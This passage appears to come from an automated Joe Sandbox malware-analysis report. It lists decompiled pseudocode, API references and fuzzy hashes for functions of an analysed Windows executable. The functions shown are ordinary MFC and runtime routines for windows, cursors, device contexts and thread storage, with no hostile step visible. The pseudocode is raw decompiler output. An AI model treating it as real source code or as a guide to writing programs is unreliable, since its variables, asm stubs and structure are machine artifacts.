						_t9 = E00424BFB() + 0x34; // 0x34
						_t35 = _t9;
						lstrcatA(_t35, _t37->lpszClassName);
						 *(_t40 + 0xa) = 0xa;
						 *((char*)(_t40 + 0xb)) = 0;
						lstrcatA(_t35, _t40 + 0xa);
						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
						E00425FC6(1);
					}
					goto L5;
				}
				goto L6;
			}

0x004142c8
0x004142d2
0x004142d9
0x004142eb
0x00414340
0x00414340
0x00414342
0x00414343
0x00414348
0x00414351
0x00414351
0x004142f7
0x00414307
0x0041430b
0x00414310
0x00414321
0x00414321
0x00414325
0x0041432a
0x00414330
0x00414333
0x00414335
0x0041433b
0x0041433b
0x00000000
0x00414307
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004142C8
GetClassInfoA.USER32 ref: 004142E3
RegisterClassA.USER32 ref: 004142EE
lstrcatA.KERNEL32(00000034,?,00000001), ref: 00414325
lstrcatA.KERNEL32(00000034,?), ref: 00414333

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction ID: 1018f0675467b52ee35bd5ff78e2a168c77a44711dd41a513890d329257c2a90
Opcode Fuzzy Hash: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction Fuzzy Hash: D4112531B04218BECB10AFA5EC41BDE7FB8EF40304F00442BF816A3191C778E6418AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427EF7, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00427EF7(void* __ecx, char _a8) {
				struct tagPOINT _v12;
				void* __ebp;
				void* _t15;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;

				_push(__ecx);
				_push(__ecx);
				_t26 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_t26 + 0x1c),  &_v12);
					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E0042799F(_t26, _t24,  &_v12,  &_a8) == 0) {
						_push(LoadCursorA(0, 0x7f00));
					} else {
						_t28 = _t26 + 0x100;
						if( *_t28 == 0) {
							 *_t28 = LoadCursorA( *(E00424BFB() + 0xc), 0x7902);
						}
						_push( *_t28);
					}
					SetCursor();
					_t15 = 0;
				} else {
					_t15 = E004136A7(__ecx);
				}
				return _t15;
			}

0x00427efa
0x00427efb
0x00427f01
0x00427f03
0x00427f10
0x00427f1d
0x00427f2a
0x00427f71
0x00427f3f
0x00427f3f
0x00427f48
0x00427f5e
0x00427f5e
0x00427f60
0x00427f60
0x00427f72
0x00427f78
0x00427f05
0x00427f05
0x00427f05
0x00427f7c

APIs

GetCursorPos.USER32(?), ref: 00427F10
ScreenToClient.USER32 ref: 00427F1D
LoadCursorA.USER32 ref: 00427F58
SetCursor.USER32(00000000), ref: 00427F72

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Cursor$ClientLoadScreen
String ID:
API String ID: 120721131-0
Opcode ID: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction ID: 6a5175c3ad254a8bfa5679941e9197540f95af319ead360478e78bd6a32066b2
Opcode Fuzzy Hash: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction Fuzzy Hash: EE019271718214EFDB209FA0DC49E9A77ACEF08315F81442BF94692250D778A981CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041031E, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041031E(void* _a4, void* _a8) {
				void* _v12;
				DEVMODEA* _t9;
				void* _t20;
				struct HDC__* _t22;
				signed short* _t23;

				if(_a4 == 0) {
					L5:
					return 0;
				}
				_t23 = GlobalLock(_a4);
				_t20 = _a8;
				if(_t20 == 0) {
					_t9 = 0;
				} else {
					_t9 = GlobalLock(_t20);
				}
				if(_t23 != 0) {
					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
					GlobalUnlock(_v12);
					if(_t20 != 0) {
						GlobalUnlock(_t20);
					}
					return _t22;
				} else {
					goto L5;
				}
			}

0x00410326
0x00410349
0x00000000
0x00410349
0x00410334
0x00410336
0x0041033c
0x00410343
0x0041033e
0x0041033f
0x0041033f
0x00410347
0x0041036e
0x00410374
0x00410378
0x0041037b
0x0041037b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GlobalLock.KERNEL32 ref: 00410332
GlobalLock.KERNEL32 ref: 0041033F
CreateDCA.GDI32(?,?,?,00000000), ref: 00410362
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 00410374
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 0041037B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$LockUnlock$Create
String ID:
API String ID: 2536725124-0
Opcode ID: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction ID: 40030820e48ceddce583e067a62accdd91ad43b1dc9828fb23a1b5466954d7d6
Opcode Fuzzy Hash: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction Fuzzy Hash: D0F08C32200225ABC3709B69CC44B67BBDCEF84B91B144826BC98D2210D768DC9596B4

Uniqueness

Uniqueness Score: -1.00%

Function 00420766, Relevance: 7.5, APIs: 5, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420766(void* __ecx) {
				struct tagMSG _v28;
				void* _t9;
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t25 + 0x1c)) {
						ReleaseCapture();
					}
					_t13 = E00414DCC(_t25);
					 *((intOrPtr*)(_t25 + 0x50)) = 0;
					 *((intOrPtr*)(_t13 + 0x50)) = 0;
					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
				}
				return _t9;
			}

0x0042076b
0x00420772
0x00420795
0x0042079d
0x0042079d
0x004207a8
0x004207aa
0x004207aa
0x004207b2
0x004207b9
0x004207c1
0x00000000
0x004207ca
0x004207d0

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 00420787
PostMessageA.USER32 ref: 0042079D
GetCapture.USER32 ref: 0042079F
ReleaseCapture.USER32 ref: 004207AA
PostMessageA.USER32 ref: 004207C7

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction ID: 6827468c5831c533ec62b3620ea1e9f85116333d279ed9cea6cc2e4bf68413d0
Opcode Fuzzy Hash: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction Fuzzy Hash: 82F0A431600748BFC6306F22EC44D177FBCFF81748B85466EF54192512D736B5068A68

Uniqueness

Uniqueness Score: -1.00%

Function 00408E53, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408E53() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x436fb0);
				if(_t16 == 0) {
					_t16 = E00407333(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x436fb0, _t16) == 0) {
						E00406490(0x10);
					} else {
						E00408E40(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x00408e61
0x00408e69
0x00408e6d
0x00408e78
0x00408e7e
0x00408ea8
0x00408e91
0x00408e92
0x00408e98
0x00408e9e
0x00408ea2
0x00408ea2
0x00408e7e
0x00408eaf
0x00408eb9

APIs

GetLastError.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E55
TlsGetValue.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E63
SetLastError.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408EAF

Part of subcall function 00407333: HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

TlsSetValue.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E87
GetCurrentThreadId.KERNEL32 ref: 00408E98

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction ID: 621b0a22466fadbf8087ca8eaa5014453414117e276020d1f2dab8d9fe1528b5
Opcode Fuzzy Hash: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction Fuzzy Hash: 4FF0CD32A01612ABC3312B21FD0DA1F3B60EB01BA1715413EF985F62E0CF38980286EC

Uniqueness

Uniqueness Score: -1.00%

Function 004239AC, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004239AC(struct tagRECT* _a4, long _a8, signed char _a10) {
				void* __esi;
				void* __ebp;
				int _t13;
				int _t14;
				intOrPtr _t16;
				void* _t19;
				struct tagRECT* _t21;

				if( *0x439c44 != 0) {
					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
				}
				if((_a8 & 0x00040600) == 0) {
					_push(GetSystemMetrics(6));
					_push(5);
				} else {
					_push(GetSystemMetrics(0x21));
					_push(0x20);
				}
				_t13 = GetSystemMetrics();
				_t21 = _a4;
				_t14 = InflateRect(_t21, _t13, ??);
				if((_a10 & 0x000000c0) != 0) {
					E00422A19(_t19, _t21);
					_t16 =  *0x439c9c; // 0x0
					_t21->top = _t21->top - _t16;
					return _t16;
				}
				return _t14;
			}

0x004239b7
0x00000000
0x004239c6
0x004239d5
0x004239f0
0x004239f1
0x004239d7
0x004239e1
0x004239e2
0x004239e2
0x004239f3
0x004239f5
0x004239fa
0x00423a04
0x00423a06
0x00423a0b
0x00423a10
0x00000000
0x00423a10
0x00423a15

APIs

AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004239C6
GetSystemMetrics.USER32 ref: 004239DF
GetSystemMetrics.USER32 ref: 004239F3
InflateRect.USER32(?,00000000), ref: 004239FA

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction ID: e5fc7e5830382d5c46746aa1a576b8dc40ee31b23e133811d6216470331d8181
Opcode Fuzzy Hash: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction Fuzzy Hash: 3DF0C831740328BBDB205F94BD09BAA3B68EF01711F848026BA496B1D0C7F85E91CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 004258D4, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004258D4(long* __ecx) {
				long _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *__ecx;
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
				}
				_t1 = _t15 + 0x14; // 0x6b2ac0
				_t5 =  *_t1;
				if(_t5 != 0) {
					do {
						_t2 = _t5 + 4; // 0x0
						_t14 =  *_t2;
						E00425BA0(_t15, _t5, 0);
						_t5 = _t14;
					} while (_t14 != 0);
				}
				_t3 = _t15 + 0x10; // 0x6a00e0
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection(_t15 + 0x1c);
				return _t6;
			}

0x004258d5
0x004258d8
0x004258dd
0x004258e0
0x004258e0
0x004258e6
0x004258e6
0x004258eb
0x004258ed
0x004258ed
0x004258ed
0x004258f5
0x004258fc
0x004258fc
0x004258ed
0x00425900
0x00425900
0x00425905
0x0042590e
0x00425911
0x00425918
0x00425918
0x00425922
0x0042592a

APIs

TlsFree.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 004258E0
GlobalHandle.KERNEL32 ref: 00425908
GlobalUnlock.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 00425911
GlobalFree.KERNEL32 ref: 00425918
DeleteCriticalSection.KERNEL32(00439990,?,?,00425DE1,00000000,00000001), ref: 00425922

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction ID: 9d5b72b6300baeafbca016f02161f8457eec0fc2b083dcd5d79a1fa835123fe9
Opcode Fuzzy Hash: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction Fuzzy Hash: 4AF05E31700A20DBC630AB39BC0CA2B77BDEF857207D5056AF811D3361DB78DC0686A8

Uniqueness

Uniqueness Score: -1.00%

Function 00428BA1, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428BA1(void* __ecx) {
				int _t22;

				_t22 = SaveDC( *(__ecx + 8));
				if( *(__ecx + 4) == 0) {
					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
				} else {
					SelectObject( *(__ecx + 4), GetStockObject(0xd));
					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
				}
				return _t22;
			}

0x00428bb5
0x00428bb7
0x00428be3
0x00428bb9
0x00428bcc
0x00428bd8
0x00428bde
0x00428be0
0x00428bef

APIs

SaveDC.GDI32(?), ref: 00428BAF
GetStockObject.GDI32(0000000D), ref: 00428BBC
SelectObject.GDI32(00000000,00000000), ref: 00428BCC
SaveDC.GDI32(00000000), ref: 00428BD1
SelectObject.GDI32(00000000,?), ref: 00428BDE

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$SaveSelect$Stock
String ID:
API String ID: 2785865535-0
Opcode ID: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction ID: 39288a4f9771774ee527ad7dc5e24ccfae81283b4a828b13e1b5aa3fcaf6deb1
Opcode Fuzzy Hash: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction Fuzzy Hash: 05F05871201708AFD7312F66EC44E2BBBA9EB44751B40453EE15682520DB72B816DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C80F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041C80F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct tagRECT _v44;
				signed int _v48;
				signed int _v52;
				struct tagRECT _v68;
				intOrPtr _t173;
				intOrPtr* _t174;
				intOrPtr _t177;
				signed char _t179;
				intOrPtr* _t181;
				signed char _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t202;
				signed int _t205;
				signed int _t206;
				signed int _t215;
				signed int _t224;
				intOrPtr* _t227;
				intOrPtr* _t232;
				intOrPtr _t233;
				signed int _t250;
				signed int _t252;
				signed int _t256;
				signed int _t260;
				void* _t263;
				signed int _t266;
				signed int _t268;
				intOrPtr _t272;
				signed int _t275;
				signed int _t279;

				_t263 = __edx;
				_t227 = __ecx;
				_t266 = 0;
				_push(0);
				_push(0);
				_push(0x418);
				_v8 = 0;
				_v52 = 0;
				_v48 = 0;
				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
				_v28 = _t275;
				if(_t275 != 0) {
					_t177 = E004131DD(_t275 + _t275 * 4 << 2);
					_v8 = _t177;
					if(_t275 > 0) {
						_v12 = _t177;
						do {
							E0041C295(_t227, _t266, _v12);
							_v12 = _v12 + 0x14;
							_t266 = _t266 + 1;
						} while (_t266 < _t275);
						_t268 = 0;
						if(_t275 > 0) {
							_t179 =  *(_t227 + 0x64);
							if((_t179 & 0x00000002) == 0) {
								_t256 = _t179 & 0x00000004;
								_v44.bottom = _t256;
								if(_t256 == 0) {
									L19:
									_push(_t268);
									asm("sbb eax, eax");
									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t215;
									_push(_t215);
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t268);
										_push( *((intOrPtr*)(_t227 + 0x54)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t179 & 0x00000001;
													if((_t179 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v44);
													E0041F52D(_t227,  &_v44, _a8 & 0x00000002);
													_t224 = _a8 & 0x00000020;
													__eflags = _t224;
													if(_t224 == 0) {
														_t260 = _v44.right - _v44.left;
														__eflags = _t260;
													} else {
														_t260 = _v44.bottom - _v44.top;
													}
													_push(_t224);
													_push(_t260 + _a12);
												}
											} else {
												_push(0);
												_push(0);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t275);
								_push(_v8);
								E0041C6B2(_t227, _t263);
							}
							_push(_t275);
							_push(_v8);
							_push( &(_v44.right));
							_t181 = E0041C4B6(_t227);
							_v52 =  *_t181;
							_v48 =  *((intOrPtr*)(_t181 + 4));
							if((_a8 & 0x00000040) != 0) {
								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
								_v20 = _t268;
								_v44.bottom =  *(_t227 + 0x84);
								if(_t275 > 0) {
									_t250 = _t275;
									_t202 = _v8 + 4;
									_v24 = _t202;
									do {
										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
											_t268 = _t268 + 1;
										}
										_t202 = _t202 + 0x14;
										_t250 = _t250 - 1;
									} while (_t250 != 0);
									if(_t268 > 0) {
										_t205 = E004131DD(_t268 + _t268 * 2 << 3);
										if(_t205 == 0) {
											_t205 = 0;
											__eflags = 0;
										} else {
											_a12 = _t268 - 1;
										}
										_v16 = _v16 & 0x00000000;
										_a12 = _a12 & 0x00000000;
										_v20 = _t205;
										_t67 = _t205 + 8; // 0x8
										_t272 = _t67;
										_t206 = _v24;
										_v12 = _t272;
										_v24 = _t206;
										do {
											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
												_t252 = _a12;
												 *((intOrPtr*)(_t272 - 8)) = _t252;
												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
												E0041A32D(_t227,  &_v68);
												_v16 = _v16 + 1;
												asm("movsd");
												asm("movsd");
												_v12 = _v12 + 0x18;
												_t206 = _v24;
												asm("movsd");
												asm("movsd");
												_t275 = _v28;
												_t272 = _v12;
											}
											_a12 = _a12 + 1;
											_t206 = _t206 + 0x14;
											_v24 = _t206;
										} while (_a12 < _t275);
										_t268 = _v16;
									}
								}
								_t185 =  *(_t227 + 0x64);
								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
								}
								_a12 = _a12 & 0x00000000;
								_t308 = _t275;
								if(_t275 > 0) {
									_v16 = _v8;
									do {
										E0041C2B4(_t227, _t308, _a12, _v16);
										_a12 = _a12 + 1;
										_v16 = _v16 + 0x14;
									} while (_a12 < _t275);
								}
								if(_t268 > 0) {
									_t187 = _v20;
									_v24 = _t268;
									_t113 = _t187 + 8; // 0x8
									_t279 = _t113;
									_a12 = _t279;
									do {
										_t188 = E0041649C(_t227,  *((intOrPtr*)(_t279 - 4)));
										_v28 = _t188;
										if(_t188 != 0) {
											GetWindowRect( *(_t188 + 0x1c),  &_v68);
											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
											E0041663D(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
											_t279 = _a12;
										}
										_t279 = _t279 + 0x18;
										_t130 =  &_v24;
										 *_t130 = _v24 - 1;
										_a12 = _t279;
									} while ( *_t130 != 0);
									E00413206(_v20);
								}
								 *(_t227 + 0x84) = _v44.bottom;
							}
							E00413206(_v8);
						}
					}
				}
				SetRectEmpty( &_v68);
				E0041F52D(_t227,  &_v68, _a8 & 0x00000002);
				_v48 = _v48 + _v68.top - _v68.bottom;
				_v52 = _v52 + _v68.left - _v68.right;
				_t232 = E0041E6BA( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t173 =  *_t232;
				_t233 =  *((intOrPtr*)(_t232 + 4));
				if(_v52 <= _t173) {
					_v52 = _t173;
				}
				if(_v48 <= _t233) {
					_v48 = _t233;
				}
				_t174 = _a4;
				 *_t174 = _v52;
				 *((intOrPtr*)(_t174 + 4)) = _v48;
				return _t174;
			}

0x0041c80f
0x0041c818
0x0041c81a
0x0041c81e
0x0041c81f
0x0041c820
0x0041c825
0x0041c828
0x0041c82b
0x0041c834
0x0041c838
0x0041c83b
0x0041c848
0x0041c850
0x0041c853
0x0041c859
0x0041c85c
0x0041c862
0x0041c867
0x0041c86b
0x0041c86c
0x0041c870
0x0041c874
0x0041c87a
0x0041c87f
0x0041c887
0x0041c88a
0x0041c88d
0x0041c8f8
0x0041c8fb
0x0041c900
0x0041c902
0x0041c902
0x0041c907
0x0041c88f
0x0041c893
0x0041c8f2
0x0041c8f2
0x0041c8f3
0x0041c895
0x0041c899
0x0041c8a3
0x0041c8a7
0x0041c8ad
0x0041c8b1
0x0041c8ee
0x0041c8f0
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c8b3
0x0041c8b7
0x0041c8ca
0x0041c8d2
0x0041c8d2
0x0041c8d5
0x0041c8e2
0x0041c8e2
0x0041c8d7
0x0041c8da
0x0041c8da
0x0041c8e5
0x0041c8eb
0x0041c8eb
0x0041c8a9
0x0041c8a9
0x0041c8aa
0x0041c8aa
0x0041c89b
0x0041c89b
0x0041c89c
0x0041c89c
0x0041c899
0x0041c893
0x0041c908
0x0041c90b
0x0041c90e
0x0041c90e
0x0041c913
0x0041c917
0x0041c91c
0x0041c91d
0x0041c92b
0x0041c92e
0x0041c931
0x0041c93d
0x0041c946
0x0041c949
0x0041c94c
0x0041c955
0x0041c957
0x0041c95a
0x0041c95d
0x0041c961
0x0041c968
0x0041c968
0x0041c969
0x0041c96c
0x0041c96c
0x0041c971
0x0041c97e
0x0041c986
0x0041c98e
0x0041c98e
0x0041c988
0x0041c989
0x0041c989
0x0041c990
0x0041c994
0x0041c998
0x0041c99b
0x0041c99b
0x0041c99e
0x0041c9a1
0x0041c9a4
0x0041c9a7
0x0041c9ab
0x0041c9b2
0x0041c9b8
0x0041c9bd
0x0041c9c6
0x0041c9d2
0x0041c9da
0x0041c9dd
0x0041c9de
0x0041c9df
0x0041c9e3
0x0041c9e6
0x0041c9e7
0x0041c9e8
0x0041c9eb
0x0041c9eb
0x0041c9ee
0x0041c9f1
0x0041c9f7
0x0041c9f7
0x0041c9fc
0x0041c9fc
0x0041c971
0x0041c9ff
0x0041ca04
0x0041ca0d
0x0041ca0d
0x0041ca10
0x0041ca14
0x0041ca16
0x0041ca1b
0x0041ca1e
0x0041ca26
0x0041ca2b
0x0041ca2e
0x0041ca32
0x0041ca1e
0x0041ca39
0x0041ca3b
0x0041ca3e
0x0041ca41
0x0041ca41
0x0041ca44
0x0041ca47
0x0041ca4c
0x0041ca53
0x0041ca56
0x0041ca5f
0x0041ca82
0x0041ca9e
0x0041caa3
0x0041caa3
0x0041caa6
0x0041caa9
0x0041caa9
0x0041caac
0x0041caac
0x0041cab4
0x0041cab9
0x0041cabd
0x0041cabd
0x0041cac6
0x0041cacb
0x0041c874
0x0041c853
0x0041cad0
0x0041cae3
0x0041caf1
0x0041cafa
0x0041cb0d
0x0041cb12
